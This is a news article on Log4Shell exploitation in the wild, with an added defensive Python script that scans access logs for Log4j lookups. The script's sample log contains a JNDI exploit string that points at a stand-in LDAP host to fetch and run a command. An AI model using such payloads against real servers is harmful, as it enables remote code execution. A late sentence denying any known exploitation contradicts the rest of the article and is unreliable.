An exploit for the Log4Shell vulnerability in the Apache Log4j logging platform was released two days ago.
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers.
An exploit for a critical zero-day vulnerability dubbed ‘Log4Shell’ in the Apache Log4j Java-based logging platform was publicly released two days ago. The vulnerability allows attackers to remotely execute commands on a vulnerable server by getting it to log a specially crafted string, for example by submitting the string as a search term or sending it as the browser’s user agent.
Apache immediately released Log4j 2.15.0 to resolve the vulnerability, but attackers have already started scanning for and exploiting vulnerable servers to exfiltrate data, install malware, or take over the server.
This software is used in thousands of enterprise applications and websites.
As soon as the vulnerability was disclosed, threat actors began exploiting Log4Shell to execute shell scripts that download and install various cryptominers.
The threat actors behind the Kinsing backdoor and cryptomining botnet are abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts.
This shell script will remove competing malware from the vulnerable device and then download and install the Kinsing malware, which will begin mining for cryptocurrency.
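The user-agent trigger described above and the Base64-encoded commands used by the Kinsing campaign are both visible in ordinary web-server access logs, so a defender can hunt for them there. The following is an added example (not code from the original article or from any vendor): it parses constructed Combined Log Format lines, flags any user agent carrying a Log4j `${...}` lookup (which legitimate browsers never send), rates a `jndi:` lookup as high severity, and decodes a `/Base64/` command segment so an analyst can see what the request tried to run. The IPs, timestamps and encoded command are constructed samples.

```python
import base64
import re
from dataclasses import dataclass

# Combined Log Format; the user agent is the last quoted field.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Any ${...} lookup in a user agent is suspicious; flagging all of them also
# catches nested or obfuscated forms without having to enumerate them.
LOOKUP_RE = re.compile(r'\$\{')
JNDI_RE = re.compile(r'jndi:', re.IGNORECASE)
# "/Base64/<payload>" segment of the kind used by the Kinsing campaign.
B64_RE = re.compile(r'/Base64/(?P<b64>[A-Za-z0-9+/=]+)')

@dataclass
class Finding:
    ip: str
    user_agent: str
    severity: str         # "high" when a jndi: lookup is present, else "medium"
    decoded_payload: str  # decoded Base64 command, or "" if none or undecodable

def decode_payload(ua):
    """Return the decoded /Base64/ command embedded in the lookup, if any."""
    m = B64_RE.search(ua)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""

def scan_log(text):
    """Return a Finding for every log line whose user agent contains a lookup."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not LOOKUP_RE.search(m.group("ua")):
            continue
        ua = m.group("ua")
        severity = "high" if JNDI_RE.search(ua) else "medium"
        findings.append(Finding(m.group("ip"), ua, severity, decode_payload(ua)))
    return findings

# Constructed sample log (not real traffic); the encoded command is harmless.
_B64 = base64.b64encode(b"echo constructed-sample").decode()
SAMPLE_LOG = (
    '203.0.113.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"\n'
    '203.0.113.9 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    f'"${{jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/{_B64}}}"\n'
    '203.0.113.9 - - [12/Dec/2021:10:01:04 +0000] "GET /login HTTP/1.1" 200 128 "-" "${sys:user.name}"\n'
)

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f.severity, f.ip, f.user_agent, repr(f.decoded_payload))
```

Running the script over the sample yields one high-severity hit with the decoded command and one medium-severity hit for the plain lookup; the benign browser line is ignored.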
According to Netlab 360, the threat actors exploit the vulnerability to install the Mirai and Muhstik malware on vulnerable devices.
These malware families recruit IoT devices and servers into their botnets and use them to deploy cryptominers and perform large-scale DDoS attacks.
The Log4j vulnerabilities are also being exploited to drop Cobalt Strike beacons.
Cobalt Strike is a legitimate penetration testing toolkit where red teams deploy agents, or beacons, on “compromised” devices to perform remote network surveillance or execute further commands.
Threat actors use cracked versions of Cobalt Strike as part of network breaches and during ransomware attacks.
Besides using the Log4Shell exploits to install malware, threat actors and security researchers are using the exploit to scan for vulnerable servers and exfiltrate information from them.
Researchers use the exploit to force vulnerable servers to access URLs or perform DNS requests for callback domains. This lets them determine whether a server is vulnerable and use that knowledge for future attacks, research, or attempts to claim a bug bounty award.
Some researchers even use the exploit to exfiltrate, without permission, environment variables that contain server data, including the host’s name, the user name the Log4j service is running under, the operating system name, and the OS version number.
Even though there has been no public research showing that anyone is using the Log4j exploit, the fact that Cobalt Strike beacons have been deployed means these attacks are imminent.
It is therefore highly recommended that all users install the latest version of Log4j, or of the affected applications, to resolve this vulnerability as soon as possible.